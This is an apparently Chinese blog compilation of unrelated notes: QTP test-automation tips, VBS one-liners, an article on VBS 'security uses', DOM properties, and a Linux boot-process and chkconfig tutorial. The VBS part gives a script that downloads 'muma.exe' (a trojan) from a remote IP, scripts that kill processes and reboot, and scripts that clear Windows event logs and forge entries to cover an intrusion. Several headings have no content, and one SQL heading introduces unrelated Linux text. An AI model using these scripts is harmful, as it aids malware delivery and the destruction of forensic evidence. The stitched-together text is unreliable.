一、Cannot find the "shoujian.projectname" object's parent "10_2" (class Frame). Verify that parent properties match an object currently displayed in your application.问题的解决。
这个问题真是郁闷，其实产生的主要原因是：在录制脚本的时候，qtp没有识别出来框架Frame中的对象，回放时找不到对象出错。
解决办法：通过object spy 识别对象 并将其添加到对象库；然后在录制点击对象的一段脚本（或者自己写），再次回放就ok了。

二、注意：datatable.Importsheet "D:\test\USER_INFO.xls",1,"Action1" 中，"Action1"一定要加双引号，要不然默认导入到Global中。

三、自动启动qtp的vbscrīpt脚本。
dim qtapp
Set qtapp=createobject("QuickTest.application")
qtapp.Launch
qtapp.visible=true
用法：将脚本卸载记事本文件中，文件格式保存为.vbs 点击直接运行。就可以自动启动qtp。

五、修改QTP中对象的默认识别属性

以WebCheckBox为例。
在QTP里面 ，选择Tools --> Object Identification...Environment选择Web，找到  WebCheckBox，看看 QTP默认的识别WebCheckBox 对象时使用的是哪些属性。可以修改识别WebCheckBox对象的属性。
注意： 修改只对以后录制的脚本起作用。

六、QTP如何测试鼠标右键菜单

七、如何设置让对象库不产生重复对象

八、QTP中用代码连接数据库

九、QTP测试页面字体颜色的办法

十、下拉菜单不能回放的解决方法

十一、QTP中如何识别带参数的链接？

十二、如何让QTP运行时自动产生提示信息并自动确定？

十三、QTP回放的过程中出现禁止运行控件提示的解决方法

十四、从QC自动启动qtp如何自动加载插件

1.文件下载(无回显) 
echo iLocal = LCase(Wscrīpt.Arguments(1)) >iget.vbe 
echo iRemote = LCase(Wscrīpt.Arguments(0)) >>iget.vbe 
echo Set xPost = createObject("Microsoft.XMLHTTP") >>iget.vbe 
echo xPost.Open "GET",iRemote,0 >>iget.vbe 
echo xPost.Send() >>iget.vbe 
echo Set sGet = createObject("ADODB.Stream") >>iget.vbe 
echo sGet.Mode = 3 >>iget.vbe 
echo sGet.Type = 1 >>iget.vbe 
echo sGet.Open() >>iget.vbe 
echo sGet.Write(xPost.responseBody) >>iget.vbe 
echo sGet.SaveToFile iLocal,2 >>iget.vbe 
用法: cscrīpt hget.vbs http://111.111.111.111/muma.exe muma.exe 

2.列举进程 
@echo for each ps in getobject _ >ps.vbs 
@echo ("winmgmts:＼＼.＼root＼cimv2:win32_process").instances_ >>ps.vbs 
@echo wscrīpt.echo ps.handle^&vbtab^&ps.name^&vbtab^&ps.executablepath:next >>ps.vbs 
用法:cscrīpt ps.vbs 

3.终止进程 
@echo for each ps in getobject _ >pskill.vbs 
@echo ("winmgmts:＼＼.＼root＼cimv2:win32_process").instances_ >>pskill.vbs 
@echo if ps.handle=wscrīpt.arguments(0) then wscrīpt.echo ps.terminate:end if:next >>pskill.vbs 
用法:cscrīpt pskill.vbs pid 

4.重启系统 
@echo for each os in getobject _ >reboot.vbs 
@echo ("winmgmts:!＼＼.＼root＼cimv2:win32_operatingsystem").instances_ >>reboot.vbs 
@echo os.win32shutdown(2):next >>reboot.vbs 
用法:cscrīpt reboot.vbs 


VBS脚本在系统安全中的八则巧妙应用 
VBS脚本病毒的大量流行使我们对VBS的功能有了一个全新的认识，目前大家对他也开始重视起来。VBS代码在本地是通过视窗系统 scrīpt Host(WSH)解释执行的。VBS脚本的执行离不开WSH，WSH是微软提供的一种基于32位视窗系统平台的、和语言无关的脚本解释机制，他使得脚本能够直接在视窗系统桌面或命令提示符下运行。利用WSH，用户能够操纵WSH对象、ActiveX对象、注册表和文件系统。在视窗系统 2000下，还可用WSH来访问视窗系统 NT活动目录服务。 
　　 
　　用VBS编写的脚本程式在窗口界面是由wscrīpt.exe文件解释执行的，在字符界面由cscrīpt.exe文件解释执行。wscrīpt.exe是个脚本语言解释器，正是他使得脚本能被执行，就象执行批处理相同。关于VBS大家一定比我熟悉多了，所以再不废话，直接进入主题，看看我总结的VBS在系统安全中的八则妙用吧。 
　　 
　　一、给注册表编辑器解锁 
　　 
　　用记事本编辑如下内容： 
　　 
　　DIM WSH 
　　SET WSH=Wscrīpt.CreateObject("Wscrīpt.SHELL") ’击活Wscrīpt.Shell对象 
　　WSH.POPUP("解锁注册表编辑器!") 
　　’显示弹出信息“解锁注册表编辑器!” 
　　WSH.Regwrite"HKCU＼Software＼Microsoft＼视窗系统＼CurrentVersion 
　　＼Policies＼System＼DisableRegistryTools",0,"REG_DWORD" 
　　’给注册表编辑器解锁 
　　WSH.POPUP("注册表解锁成功!") 
　　’显示弹出信息“注册表解锁成功!” 
　　保存为以.vbs为扩展名的文件，使用时双击即可。 
　　 
　　二、关闭Win NT/2000的默认共享 
　　 
　　用记事本编辑如下内容： 
　　 
　　Dim WSHShell’定义变量 
　　set WSHShell=CreateObject("Wscrīpt.shell") ’创建一个能和操作系统沟通的对象WSHShell 
　　Dim fso,dc 
　　Set fso=CreateObject("scrīpting.FileSystemObject")’创建文件系统对象 
　　set dc=fso.Drives ’获取所有驱动器盘符 
　　For Each d in dc 
　　Dim str 
　　WSHShell.run("net share"&d.driveletter &"$ /delete")’关闭所有驱动器的隐藏共享 
　　next 
　　WSHShell.run("net share admin$ /delete") 
　　WSHShell.run("net share ipc$ /delete")’关闭admin$和ipc$管道共享 
　　 
　　目前来测试一下，先打开cmd.exe，输入net share命令就能看到自己机子上的共享。双击执行stopshare.vbs后，会看见窗口一闪而过。然后再在cmd里输入net share命令，这时候没有发现共享列表了 
　　 
　　三、显示本机IP地址 
　　 
　　有许多时候，我们需要知道本机的IP地址，使用各种软件虽然能办到，但用VBS脚本也非常的方便。用记事本编辑如下内容： 
　　 
　　Dim WS 
　　Set WS=CreateObject("MSWinsock.Winsock") 
　　IPAddress=WS.LocalIP 
　　MsgBox "Local IP=" & IPAddress 
　　 
　　将上面的内容保存为ShowIP.vbs，双击执行即可得到本机IP地址。 
　　 
　　四、利用脚本编程删除日志 
　　 
　　入侵系统成功后黑客做的第一件事便是清除日志，如果以图像界面远程控制对方机器或是从终端登陆进入，删除日志不是一件困难的事，由于日志虽然也是作为一种服务运行，但不同于http,ftp这样的服务，能在命令行下先停止，再删除，在命令行下用net stop eventlog是不能停止的，所以有人认为在命令行下删除日志是非常困难的，实际上不是这样，比方说利用脚本编程中的VMI就能删除日志，而且非常的简单方便。原始码如下： 
　　 
　　strComputer= "." 
　　Set objWMIService = GetObject("winmgmts:" _ 
　　& "{impersonationLevel=impersonate,(Backup)}!＼＼" & _ 
　　strComputer & "＼root＼cimv2") 
　　dim mylogs(3) 
　　mylogs(1)="application" 
　　mylogs(2)="system" 
　　mylogs(3)="security" 
　　for Each logs in mylogs 
　　Set colLogFiles=objWMIService.ExecQuery _ 
　　("Select * from Win32_NTEventLogFile where LogFileName=’"&logs&"’") 
　　For Each objLogfile in colLogFiles 
　　objLogFile.ClearEventLog() 
　　Next 
　　next 
　　 
　　将上面的代码保存为cleanevent.vbs文件即可。在上面的代码中，首先获得object对象，然后利用其clearEventLog()方法删除日志。建立一个数组，application,security,system，如果更有其他日志也能加入数组。然后用一个for循环，删除数组中的每一个元素，即各个日志。 
　　 
　　五、利用脚本伪造日志 
　　 
　　删除日志后，所有一个有头脑的管理员面对空空的日志，马上就会反应过来被入侵了，所以一个聪明的黑客的学会怎么伪造日志。利用脚本编程中的eventlog方法创造日志非常简单，请看下面的代码： 
　　 
　　set ws=wscrīpt.createobject("Wscrīpt.shell") 
　　ws.logevent 0 ,"write log success" ’创建一个成功执行日志 
　　 
　　将上面的代码保存为createlog.vbs即可。这段代码非常容易理解，首先获得wscrīpt的一个shell对象，然后利用shell对象的logevent方法。logevent的用法：logevent eventtype,"descrīption" [,remote system]，其中eventtype为日志类型，能使用的参数如下：0代表成功执行，1执行出错，2警告，4信息，8成功审计，16故障审计。所以上面代码中，把0改为1,2,4,8,16均可，引号中的内容为日志描述。利用这种方法写的日志有一个缺点，即只能写到应用程式日志，而且日志来源只能为WSH，即视窗系统 scrīpting Host，所以不能起太多的隐蔽作用，在此仅供大家参考。 
　　 
　　六、禁用开始菜单选项 
　　 
　　用记事本编辑如下内容： 
　　 
　　Dim ChangeStartMenu 
　　Set ChangeStartMenu=Wscrīpt.CreateObject("Wscrīpt.Shell") 
　　RegPath="HKCR＼Software＼Microsoft＼视窗系统＼CurrentVersion＼Policies＼" 
　　Type_Name="REG_DWORD" 
　　Key_Data=1 
　　 
　　StartMenu_Run="NoRun" 
　　StartMenu_Find="NoFind" 
　　StartMenu_Close="NoClose" 
　　 
　　Sub Change(Argument) 
　　ChangeStartMenu.RegWrite RegPath&Argument,Key_Data,Type_Name 
　　MsgBox("Success!") 
　　End Sub 
　　 
　　Call Change(StartMenu_Run) ’禁用“开始”菜单中的“运行”功能 
　　Call Change(StartMenu_Find) ’禁用“开始”菜单中的“查找”功能 
　　Call Change(StartMenu_Close) ’禁用“开始”菜单中的“关闭系统”功能 
　　 
　　将以上代码保存为ChangeStartMenu.vbs文件，使用时双击即可。 
　　 
　　七、执行外部程式 
　　 
　　用记事本编辑如下内容： 
　　 
　　DIM objShell 
　　set objShell=wscrīpt.createObject("wscrīpt.shell") 
　　iReturn=objShell.Run("cmd.exe /C set var=world", 1, TRUE) 
　　 
　　保存为.vbs文件即可。在这段代码中，我们首先设置了一个环境变量，其名为var，而值为world，用户能使用%Comspec%来代替cmd.exe，并且能把命令：set var=world改成其他的命令，这样就能使他能运行任意的命令。 
　　 
　　八、重新启动指定的IIS服务 
　　 
　　用记事本编辑如下内容： 
　　 
　　Const ADS_SERVICE_STOPPED = 1 
　　Set objComputer = GetObject("WinNT://MYCOMPUTER,computer") 
　　Set objService = objComputer.GetObject("Service","MYSERVICE") 
　　If (objService.Status = ADS_SERVICE_STOPPED) Then 
　　objService.Start 
　　End If 
　　 
　　将他以startsvc.vbs为名保存在C盘根目录。并通过如下命令执行：cscrīpt c:＼startsvc.vbs。运行后，经你指定的IIS服务项将被重新开启。 
　　 
　　最后，我们再说说开篇时提到的VBS脚本病毒的防范方法。VBS病毒的执行离不开WSH，在带给人们便利的同时，WSH也为病毒的传播留下可乘之机。所以要想防范VBS病毒，能选择将WSH卸载，只要打开控制面板，找到“添加/删除程式”，点选“视窗系统安装程式”，再鼠标双击其中的“附件”一项，然后再在打开的窗口中将“视窗系统 scrīpting Host”一项的“√”去掉，然后连续点两次“确定”就能将WSH卸载。或，你也能点击“我的计算机”→“查看”→“目录选项”，在弹出的对话框中，点击“文件类型”，然后删除VBS、VBE、JS、JSE文件后缀名和应用程式的映射，都能达到防范VBS脚本病毒的目的。 

 

QTP自动化测试工程师需要掌握的DOM

在使用QTP测试WEB页面时，经常需要利用测试对象中的Object属性来访问和操作DOM，因此，QTP自动化测试工程师非常有必要掌握一些常用的DOM知识。 下面就列举了一些常用的DOM属性、方法和集合：

常用DOM 属性

• className.同一样式规则的元素用相同的类名。可以通过className快速过滤出一组类似的元素。
• document.用于指向包含当前元素的文档对象。
• id.当前元素的标识。如果文档中包含多个相同id的元素，则返回一个数组。
• innerHTML.用于指向当前元素的开始标记和结束标记之间的所有文本和HTML标签。
• innerText.用于指向当前元素的开始标记和结束标记之间的所有文本和HTML标签。
• offsetHeight, offsetWidth.元素的高度和宽度。
• offsetLeft, offsetTop.当前元素相同对于父亲元素的左边位置和顶部位置。
• outerHTML.当前元素的开始标记和结束标记之间的所有文本和HTML标签。
• outerText.当前元素的开始标记和结束标记之间的所有文本，但不包括HTML标签。
• parentElement.当前元素的父亲元素。
• sourceIndex.元素在document.all集合中的索引（index）。
• style.元素的样式表单属性。
• tagName.当前元素的标签名。
• title.在IE中，代表元素的tool tip文本。

常用DOM 方法

• click().模拟用户对当前元素的鼠标点击。
• contains(element).用于判断当前元素是否包含指定的元素。
• getAttribute(attributeName, caseSensitive).返回当前元素所包含的某个属性，参数attributeName为属性名、caseSensitive表示是否大小写敏感。
• setAttribute(attributeName, value, caseSenstive). 设置当前元素的属性。

常用DOM 集合

• All[].当前元素中包含的所有HTML元素的数组。
• children[].当前元素包含的孩子元素。

getcelldata的用法:

Browser().Page().WebTable().getcelldata(行，列)

getcelldata取到的值为字符串类型，如果要与数值型变量比较需要用CInt函数把取到的值强制转换为数值型。

 

几道经典的SQL笔试题目（有答案）

引:本文以RedHat9.0和i386平台为例，剖析了从用户打开电源直到屏幕出现命令行提示符的整个Linux启动过程。并且介绍了启动中涉及到的各种文件。
阅读Linux源代码，无疑是深入学习Linux的最好方法。在本文对Linux启动过程的介绍中，我们也尝试从源代码的视角来更深入的剖析Linux 的启动过程，所以其中也简单涉及到部分相关的Linux源代码，Linux启动这部分的源码主要使用的是C语言，也涉及到了少量的汇编。
而启动过程中也执行了大量的shell(主要是bash shell)所写脚本。为了方便读者阅读，笔者将整个Linux启动过程分成以下几个部分逐一介绍，大家可以参考下图：
当用户打开PC的电源，BIOS开机自检，按BIOS中设置的启动设备(通常是硬盘)启动，接着启动设备上安装的引导程序lilo或grub开始引导 Linux，Linux首先进行内核的引导，接下来执行init程序，init程序调用了rc.sysinit和rc等程序，rc.sysinit和rc 当完成系统初始化和运行服务的任务后，返回init；init启动了mingetty后，打开了终端供用户登录系统，用户登录成功后进入了Shell，这 样就完成了从开机到登录的整个启动过程。
下面就将逐一介绍其中几个关键的部分：

第一部分：内核的引导(核内引导)
Red Hat9.0可以使用lilo或grub等引导程序开始引导Linux系统，当引导程序成功完成引导任务后，Linux从它们手中接管了CPU的控制权， 然后CPU就开始执行Linux的核心映象代码，开始了Linux启动过程。这里使用了几个汇编程序来引导Linux，这一步泛及到Linux源代码树中 的“arch/i386/boot”下的这几个文件：bootsect.S、setup.S、video.S等。
其中 bootsect.S是生成引导扇区的汇编源码，它完成加载动作后直接跳转到setup.S的程序入口。setup.S的主要功能就是将系统参数（包括内 存、磁盘等，由BIOS返回）拷贝到特别内存中，以便以后这些参数被保护模式下的代码来读取。此外，setup.S还将video.S中的代码包含进来， 检测和设置显示器和显示模式。最后，setup.S将系统转换到保护模式，并跳转到 0x100000。
那么0x100000这个内存地址中存放的是什么代码？而这些代码又是从何而来的呢？
0x100000这个内存地址存放的是解压后的内核，因为Red Hat提供的内核包含了众多驱动和功能而显得比较大，所以在内核编译中使用了“makebzImage”方式，从而生成压缩过的内核，在RedHat中内 核常常被命名为vmlinuz，在Linux的最初引导过程中，是通过"arch/i386/boot/compressed/"中的head.S利用 misc.c中定义的decompress_kernel()函数，将内核vmlinuz解压到0x100000的。
当CPU跳到 0x100000时，将执行"arch/i386/kernel/head.S"中的startup_32，它也是vmlinux的入口，然后就跳转到 start_kernel()中去了。start_kernel()是"init/main.c"中的定义的函数，start_kernel()中调用了 一系列初始化函数，以完成kernel本身的设置。
start_kernel()函数中，做了大量的工作来建立基本的Linux核心环境。如果顺利执行完start_kernel()，则基本的Linux核心环境已经建立起来了。
在start_kernel()的最后，通过调用init()函数，系统创建第一个核心线程，启动了init过程。而核心线程init()主要是来进行 一些外设初始化的工作的，包括调用do_basic_setup()完成外设及其驱动程序的加载和初始化。并完成文件系统初始化和root文件系统的安 装。
当do_basic_setup()函数返回init()，init()又打开了/dev/console设备，重定向三个标准的输 入输出文件stdin、stdout和stderr到控制台，最后，搜索文件系统中的init程序（或者由init=命令行参数指定的程序），并使用 execve()系统调用加载执行init程序。到此init()函数结束，内核的引导部分也到此结束了。

第二部分：运行init
init的进程号是1，从这一点就能看出，init进程是系统所有进程的起点，Linux在完成核内引导以后，就开始运行init程序。init程序需 要读取配置文件/etc/inittab。inittab是一个不可执行的文本文件，它有若干行指令所组成。在Redhat系统中，inittab的内容 如下所示(以“###"开始的中注释为笔者增加的)：
#
# inittab
This file describes how the
INIT process should set up
# the system in a certain run-level.
#
# Author:Miquel van Smoorenburg,

#Modified for RHS Linux by Marc
Ewing and Donnie Barnes
#
# Default runlevel.
The runlevels used by RHS are:
# 0 - halt (Do NOT set initdefault to this)
# 1 - Single user mode
# 2 - Multiuser, without NFS
(The same as 3, if you do not havenetworking)
# 3 - Full multiuser mode
# 4 - unused
# 5 - X11
# 6 - reboot
(Do NOT set initdefault to this)
#
###表示当前缺省运行级别为5(initdefault)；
id:5:initdefault:
###启动时自动执行/etc/rc.d/rc.sysinit脚本(sysinit)
# System initialization.
si::sysinit:/etc/rc.d/rc.sysinit
l0:0:wait:/etc/rc.d/rc 0
l1:1:wait:/etc/rc.d/rc 1
l2:2:wait:/etc/rc.d/rc 2
l3:3:wait:/etc/rc.d/rc 3
l4:4:wait:/etc/rc.d/rc 4
###当运行级别为5时，
以5为参数运行/etc/rc.d/rc脚本，
init将等待其返回(wait)
l5:5:wait:/etc/rc.d/rc 5
l6:6:wait:/etc/rc.d/rc 6
###在启动过程中允许按
CTRL-ALT-DELETE重启系统
# Trap CTRL-ALT-DELETE
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
# When our UPS tells us power has failed,
assume we have a few minutes
# of power left. Schedule a shutdown
for 2 minutes from now.
# This does, of course, assume you have
powerd installed and your
# UPS connected and working correctly.
pf::powe***il:/sbin/shutdown -f -h +2
"Powe* **ilure; System Shutting Down"
# If power was restored before the
shutdown kicked in, cancel it.
pr:12345:powerokwait:/sbin/shutdown
-c "Power Restored; Shutdown Cancelled"
###在2、3、4、5级别上以ttyX为参数执行
/sbin/mingetty程序，
打开ttyX终端用于用户登录。
###如果进程退出则再次运行mingetty程序(respawn)
# Run gettys in standard runlevels
1:2345:respawn:/sbin/mingetty tty1
2:2345:respawn:/sbin/mingetty tty2
3:2345:respawn:/sbin/mingetty tty3
4:2345:respawn:/sbin/mingetty tty4
5:2345:respawn:/sbin/mingetty tty5
6:2345:respawn:/sbin/mingetty tty6
###在5级别上运行xdm程序，
提供xdm图形方式登录界面，
并在退出时重新执行(respawn)
# Run xdm in runlevel 5
x:5:respawn:/etc/X11/prefdm -nodaemon

以上面的inittab文件为例，来说明一下inittab的格式。其中以#开始的行是注释行，除了注释行之外，每一行都有以下格式：
id:runlevel:action:process
对上面各项的详细解释如下：
1. id
id是指入口标识符，它是一个字符串，对于getty或mingetty等其他login程序项，要求id与tty的编号相同，否则getty程序将不能正常工作。
2. runlevel
runlevel 是init所处于的运行级别的标识，一般使用0－6以及S或s。0、1、6运行级别被系统保留：其中0作为shutdown动作，1作为重启至单用户模 式，6为重启；S和s意义相同，表示单用户模式，且无需inittab文件，因此也不在inittab中出现。
实际上，进入单用户模式 时，init直接在控制台（/dev/console）上运行/sbin/sulogin。在一般的系统实现中，都使用了2、3、4、5几个级别，在 Redhat系统中，2表示无NFS支持的多用户模式，3表示完全多用户模式（也是最常用的级别），4保留给用户自定义，5表示XDM图形登录方式。
7－9级别也是可以使用的，传统的Unix系统没有定义这几个级别。runlevel可以是并列的多个值，以匹配多个运行级别，对大多数action来说，仅当runlevel与当前运行级别匹配成功才会执行。
3. action
action是描述其后的process的运行方式的。action可取的值包括：initdefault、sysinit、boot、bootwait等：
initdefault 是一个特殊的action值，用于标识缺省的启动级别；当init由核心激活以后，它将读取inittab中的initdefault项，取得其中的 runlevel，并作为当前的运行级别。如果没有inittab文件，或者其中没有initdefault项，init将在控制台上请求输入 runlevel。
sysinit、boot、bootwait等action将在系统启动时无条件运行，而忽略其中的runlevel。其 余的action（不含initdefault）都与某个runlevel相关。各个action的定义在inittab的man手册中有详细的描述。
4. process
process为具体的执行程序。程序后面可以带参数。
第三部分：系统初始化

在init的配置文件中有这么一行：
si::sysinit:/etc/rc.d/rc.sysinit
它 调用执行了/etc/rc.d/rc.sysinit，而rc.sysinit是一个bash shell的脚本，它主要是完成一些系统初始化的工作，rc.sysinit是每一个运行级别都要首先运行的重要脚本。它主要完成的工作有：激活交换分 区，检查磁盘，加载硬件模块以及其它一些需要优先执行任务。
rc.sysinit约有850多行，但是每个单一的功能还是比较简单，而且带有 注释，建议有兴趣的用户可以自行阅读自己机器上的该文件，以了解系统初始化所详细情况。由于此文件较长，所以不在本文中列出来，也不做具体的介绍。当 rc.sysinit程序执行完毕后，将返回init继续下一步。

第四部分：启动对应运行级别的守护进程

在rc.sysinit执行后，将返回init继续其它的动作，通常接下来会执行到/etc/rc.d/rc程序。以运行级别3为例，init将执行配置文件inittab中的以下这行：
l5:5:wait:/etc/rc.d/rc 5
这 一行表示以5为参数运行/etc/rc.d/rc，/etc/rc.d/rc是一个Shell脚本，它接受5作为参数，去执行/etc/rc.d /rc5.d/目录下的所有的rc启动脚本，/etc/rc.d/rc5.d/目录中的这些启动脚本实际上都是一些链接文件，而不是真正的rc启动脚本， 真正的rc启动脚本实际上都是放在/etc/rc.d/init.d/目录下。而这些rc启动脚本有着类似的用法，它们一般能接受start、stop、 restart、status等参数。
/etc/rc.d/rc5.d/中的rc启动脚本通常是K或S开头的链接文件，对于以以S开头的启动 脚本，将以start参数来运行。而如果发现存在相应的脚本也存在K打头的链接，而且已经处于运行态了(以/var/lock/subsys/下的文件作 为标志)，则将首先以stop为参数停止这些已经启动了的守护进程，然后再重新运行。这样做是为了保证是当init改变运行级别时，所有相关的守护进程都 将重启。
至于在每个运行级中将运行哪些守护进程，用户可以通过chkconfig或setup中的"System Services"来自行设定。常见的守护进程有：
amd：自动安装NFS守护进程
apmd:高级电源管理守护进程
arpwatch：记录日志并构建一个在LAN接口上看到的以太网地址和IP地址对数据库
autofs：自动安装管理进程automount，与NFS相关，依赖于NIS
crond：Linux下的计划任务的守护进程
named：DNS服务器
netfs：安装NFS、Samba和NetWare网络文件系统
network：激活已配置网络接口的脚本程序
nfs：打开NFS服务
portmap：RPC portmap管理器，它管理基于RPC服务的连接
sendmail：邮件服务器sendmail
smb：Samba文件共享/打印服务
syslog：一个让系统引导时起动syslog和klogd系统日志守候进程的脚本
xfs：X Window字型服务器，为本地和远程X服务器提供字型集
Xinetd：支持多种网络服务的核心守护进程，可以管理wuftp、sshd、telnet等服务
这些守护进程也启动完成了，rc程序也就执行完了，然后又将返回init继续下一步。

第五部分：建立终端

rc执行完毕后，返回init。这时基本系统环境已经设置好了，各种守护进程也已经启动了。init接下来会打开6个终端，以便用户登录系统。通过按Alt+Fn(n对应1-6)可以在这6个终端中切换。在inittab中的以下6行就是定义了6个终端：
1:2345:respawn:/sbin/mingetty tty1
2:2345:respawn:/sbin/mingetty tty2
3:2345:respawn:/sbin/mingetty tty3
4:2345:respawn:/sbin/mingetty tty4
5:2345:respawn:/sbin/mingetty tty5
6:2345:respawn:/sbin/mingetty tty6
从 上面可以看出在2、3、4、5的运行级别中都将以respawn方式运行mingetty程序，mingetty程序能打开终端、设置模式。同时它会显示 一个文本登录界面，这个界面就是我们经常看到的登录界面，在这个登录界面中会提示用户输入用户名，而用户输入的用户将作为参数传给login程序来验证用 户的身份。

第六部分：登录系统，启动完成

对于运行级别为5的图形方式用户来说，他们的登录是通过一个图形化的登录界面。登录成功后可以直接进入KDE、Gnome等窗口管理器。而本文主要讲的还是文本方式登录的情况：
当我们看到mingetty的登录界面时，我们就可以输入用户名和密码来登录系统了。
Linux 的账号验证程序是login，login会接收mingetty传来的用户名作为用户名参数。然后login会对用户名进行分析：如果用户名不是 root，且存在/etc/nologin文件，login将输出nologin文件的内容，然后退出。这通常用来系统维护时防止非root用户登录。
只有/etc/securetty中登记了的终端才允许root用户登录，如果不存在这个文件，则root可以在任何终端上登录。/etc/usertty文件用于对用户作出附加访问限制，如果不存在这个文件，则没有其他限制。
在分析完用户名后，login将搜索/etc/passwd以及/etc/shadow来验证密码以及设置账户的其它信息，比如：主目录是什么、使用何种shell。如果没有指定主目录，将默认为根目录；如果没有指定shell，将默认为/bin/bash。
login 程序成功后，会向对应的终端在输出最近一次登录的信息(在/var/log/lastlog中有记录)，并检查用户是否有新邮件(在/usr/spool /mail/的对应用户名目录下)。然后开始设置各种环境变量：对于bash来说，系统首先寻找/etc/profile脚本文件，并执行它；然后如果用 户的主目录中存在.bash_profile文件，就执行它。
在这些文件中又可能调用了其它配置文件，所有的配置文件执行后后，各种环境变量也设好了，这时会出现大家熟悉的命令行提示符，到此整个启动过程就结束了。
希望通过上面对Linux启动过程的剖析能帮助那些想深入学习Linux用户建立一个相关Linux启动过程的清晰概念，进而可以进一步研究Linux接下来是如何工作的。

如果服务器重启之后需要手工开启许多服务、工作及以后的维护相对比较繁琐、特地总结了下linux下开机自动启动脚本所涉及的知识和方法、如下：
1、相关基础知识点
1）redhat的启动方式和执行次序是：
   加载内核
   执行init程序
   /etc/rc.d/rc.sysinit # 由init执行的第一个脚本
   /etc/rc.d/rc $RUNLEVEL # $RUNLEVEL为缺省的运行模式
   /etc/rc.d/rc.local     #相应级别服务启动之后、在执行该文件（其实也可以把需要执行的命令写到该文件中）
   /sbin/mingetty # 等待用户登录
  
   在Redhat中，/etc/rc.d/rc.sysinit主要做在各个运行模式中相同的初始化工作，包括：
   调入keymap以及系统字体
   启动swapping
   设置主机名
   设置NIS域名
   检查（fsck）并mount文件系统
   打开quota
   装载声卡模块
   设置系统时钟
   等等。
   /etc/rc.d/rc则根据其参数指定的运行模式(运行级别，你在inittab文件中可以设置)来执行相应目录下的脚本。凡是以Kxx开头的
   ，都以stop为参数来调用；凡是以Sxx开头的，都以start为参数来调用。调用的顺序按xx
   从小到大来执行。(其中xx是数字、表示的是启动顺序)例如，假设缺省的运行模式是3，/etc/rc.d/rc就会按上述方式调用
   /etc/rc.d/rc3.d/下的脚本。
   值得一提的是，Redhat中的运行模式2、3、5都把/etc/rc.d/rc.local做为初始化脚本中
   的最后一个，所以用户可以自己在这个文件中添加一些需要在其他初始化工作之后，登录之前执行的命令。
  
   init在等待/etc/rc.d/rc执行完毕之后（因为在/etc/inittab中/etc/rc.d/rc的
   action是wait），将在指定的各个虚拟终端上运行/sbin/mingetty，等待用户的登录。
   至此，LINUX的启动结束。

    2）init运行级别及指令
一、什么是INIT:
　　init是Linux系统操作中不可缺少的程序之一。
　　所谓的init进程，它是一个由内核启动的用户级进程。
　　内核自行启动（已经被载入内存，开始运行，并已初始化所有的设备驱动程序和数据结构等）之后，就通过启动一个用户级程序init的方式，完成引导进程。所以,init始终是第一个进程（其进程编号始终为1）。
　　内核会在过去曾使用过init的几个地方查找它，它的正确位置（对Linux系统来说）是/sbin/init。如果内核找不到init，它就会试着运行/bin/sh，如果运行失败，系统的启动也会失败。
　　二、运行级别
　　那么，到底什么是运行级呢？
　　简单的说，运行级就是操作系统当前正在运行的功能级别。这个级别从1到6 ，具有不同的功能。
　　不同的运行级定义如下
　　# 0 - 停机（千万不能把initdefault 设置为0 ）
　　# 1 - 单用户模式                                  # s init s = init 1
　　# 2 - 多用户，没有 NFS
　　# 3 - 完全多用户模式(标准的运行级)
　　# 4 - 没有用到
　　# 5 - X11 多用户图形模式（xwindow)
　　# 6 - 重新启动 （千万不要把initdefault 设置为6 ）
　　这些级别在/etc/inittab 文件里指定。这个文件是init 程序寻找的主要文件，最先运行的服务是放在/etc/rc.d 目录下的文件。在大多数的Linux 发行版本中，启动脚本都是位于 /etc/rc.d/init.d中的。这些脚本被用ln 命令连接到 /etc/rc.d/rcn.d 目录。(这里的n 就是运行级0-6)
   3）：chkconfig 命令（redhat 操作系统下）
    不像DOS 或者 Windows，Linux 可以有多种运行级。常见的就是多用户的2,3,4,5 ，很多人知道 5 是运行 X-Windows 的级别，而 0 就    是关机了。运行级的改变可以通过 init 命令来切换。例如，假设你要维护系统进入单用户状态，那么，可以使用 init 1 来切换。在    Linux 的运行级的切换过程中，系统会自动寻找对应运行级的目录/etc/rc[0-6].d下的K 和 S 开头的文件，按后面的数字顺序，执行这    些脚本。对这些脚本的维护，是很繁琐的一件事情，Linux 提供了chkconfig 命令用来更新和查询不同运行级上的系统服务。
    语法为：
   
    chkconfig --list [name]
    chkconfig --add name
    chkconfig --del name
    chkconfig [--level levels] name
    chkconfig [--level levels] name
   
    chkconfig 有五项功能：添加服务，删除服务，列表服务，改变启动信息以及检查特定服务的启动状态。
   
    chkconfig 没有参数运行时，显示用法。如果加上服务名，那么就检查这个服务是否在当前运行级启动。如果是，返回 true，否则返回    false。 --level 选项可以指定要查看的运行级而不一定是当前运行级。
   
    如果在服务名后面指定了on，off 或者 reset，那么 chkconfig 会改变指定服务的启动信息。on 和 off 分别指服务在改变运行级时的    启动和停止。reset 指初始化服务信息，无论有问题的初始化脚本指定了什么。
   
    对于 on 和 off 开关，系统默认只对运行级 3，4， 5有效，但是 reset 可以对所有运行级有效。指定 --level 选项时，可以选择特    定的运行级。
   
    需要说明的是，对于每个运行级，只能有一个启动脚本或者停止脚本。当切换运行级时，init 不会重新启动已经启动的服务，也不会再    次去停止已经停止的服务。
   
    选项介绍：
   
    --level levels
    指定运行级，由数字 0 到 7 构成的字符串，如：
   
    --level 35 表示指定运行级3 和5。
    要在运行级别3、4、5中停运 nfs 服务，使用下面的命令：chkconfig --level 345 nfs off
   
    --add name
    这个选项增加一项新的服务，chkconfig 确保每个运行级有一项 启动(S) 或者 杀死(K) 入口。如有缺少，则会从缺省的init 脚本自动    建立。
   
    --del name
    用来删除服务，并把相关符号连接从 /etc/rc[0-6].d 删除。
   
    --list name
    列表，如果指定了name 那么只是显示指定的服务名，否则，列出全部服务在不同运行级的状态。
   
    运行级文件
   
    每个被chkconfig 管理的服务需要在对应的init.d 下的脚本加上两行或者更多行的注释。
    第一行告诉 chkconfig 缺省启动的运行级以及启动和停止的优先级。如果某服务缺省不在任何运行级启动，那么使用 - 代替运行级。
    第二行对服务进行描述，可以用 跨行注释。
   
    例如，random.init 包含三行：
    # chkconfig: 2345 20 80
    # descrīption: Saves and restores system entropy pool for
    # higher quality random number generation.
    表明 random 脚本应该在运行级 2, 3, 4, 5 启动，启动优先权为20，停止优先权为 80。
   
    好了，介绍就到这里了，去看看自己目录下的/etc/rc.d/init.d 下的脚本吧。  
   
    设置自启动服务:chkconfig --level 345 nfs on
     

2. 实例介绍：
